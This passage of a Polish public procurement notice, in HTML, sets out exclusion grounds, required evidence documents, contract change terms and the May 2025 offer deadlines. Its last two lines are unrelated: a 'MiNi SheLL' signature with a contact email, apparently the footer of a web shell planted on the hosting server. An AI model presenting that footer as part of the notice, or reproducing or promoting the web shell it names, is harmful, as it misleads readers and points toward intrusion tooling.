r. poz. 507).<br/>Brak podstaw do wykluczenia Zamawiający oceni na podstawie złożonego wraz z ofertą oświadczenia dotyczącego przesłanek wykluczenia z postępowania (wzór oświadczenia - załącznik nr 2 do SWZ);<br/>8.	nie podlegają wykluczeniu na podstawie art. 5k Rozporządzenia (UE) nr 833/2014 z dnia 31 lipca 2014 r. dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie (Dz. Urz. UE L 229 z 31.07.2024, str. 1 z późn. zm.).<br/>Brak podstaw do wykluczenia Zamawiający oceni na podstawie złożonego wraz z ofertą oświadczenia dotyczącego przesłanek wykluczenia z postępowania (wzór oświadczenia- załącznik nr 2 do SWZ). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Do oferty każdy Wykonawca musi dołączyć aktualne na dzień składania ofert oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp, o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w załącznikach nr 2, 2A, 3, 3A i 3B do SWZ. Informacje zawarte w oświadczeniach będą stanowić dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>2.	Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>3.	W rozdziale IX SWZ opisano wymagania w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców.<br/>4.	W rozdziale VIII SWZ opisano wymagania w przypadku powoływania się na zasoby podmiotu udostępniającego zasoby.<br/>5.	Zamawiający nie wymaga składania przedmiotowych środków dowodowych.<br/>6.	Zamawiający przed wyborem najkorzystniejszej oferty, w wyznaczonym terminie, wezwie Wykonawcę, którego oferta została najwyżej ocenioną w danej części, do złożenia, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">6.	Zamawiający przed wyborem najkorzystniejszej oferty, w wyznaczonym terminie, wezwie Wykonawcę, którego oferta została najwyżej ocenioną w danej części, do złożenia, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>W celu wykazania braku podstaw do wykluczenia:<br/>1)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp;<br/>W celu potwierdzenia spełniania warunków udziału w postępowaniu: <br/>wykaz dostaw (wzór - załącznik nr 5 do SWZ) wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie-, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; <br/>Zamawiający odstępuje od obowiązku dostarczenia dowodów w przypadku, gdy wykazane dostawy w przedstawionym wykazie (wykaz dostaw - załącznik nr 5 do SWZ) były przedmiotem uprzednio zawartej umowy pomiędzy Zamawiającym a Wykonawcą a umowa została wykonana należycie.<br/>Jeżeli dotyczy:<br/>2)	oświadczenie, z którego wynika które dostawy lub usługi wykonają poszczególni Wykonawcy (wzór - załącznik nr 7 do SWZ);<br/>3)	dokumenty potwierdzające brak podstaw do wykluczenia podmiotów, na których zasobach Wykonawca polega oraz potwierdzające spełnianie przez te podmioty warunków udziału w postępowaniu (w zakresie w jaki inny podmiot je udostępnia).<br/>7.	WYKONAWCA ZAGRANICZNY. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:<br/>1)	zamiast dokumentów, o których mowa w rozdziale VII ust. 6 pkt 1 SWZ, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury wystawione nie wcześniej niż 3 miesiące przed ich złożeniem; <br/>2)	jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w rozdziale VII pkt. 6 ust. 1 SWZ lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1, 2 lit. a i b oraz pkt 3 ustawy Pzp, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga składania przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Informacje i wymagania określa rozdział IX SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy<br/>1.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany.<br/>2.	Zamawiający przewiduje możliwość zmiany umowy, w formie aneksu, gdy wystąpią okoliczności, o których mowa w art. art. 455 ust. 1 pkt 1-4 oraz ust. 2 ustawy Pzp.<br/>3.	Zamawiający przewiduje również możliwość zmiany umowy:<br/>1) w zakresie przedłużenia terminu realizacji umowy, spowodowanym siłą wyższą bądź innymi przyczynami natury obiektywnej związanymi z wystąpieniem zdarzeń losowych, zagrożeń epidemicznych, działań rządowych, których przy wykazaniu należytej staranności po stronie wykonawcy, nie udało się uzyskać w terminie,<br/>2) w zakresie podwykonawstwa, <br/>3) zmiany stawki podatku VAT, w związku ze zmianą obowiązujących przepisów w tym zakresie.<br/>4. Zamawiający przewiduje możliwość zmiany umowy w przypadku, gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.<br/>5. Niedopuszczalna jest jednak pod rygorem nieważności zmiana postanowień zawartej umowy oraz wprowadzenie nowych postanowień do umowy niekorzystnych dla Zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie, której dokonano wyboru Wykonawcy, chyba że konieczność wprowadzonych zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-08 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com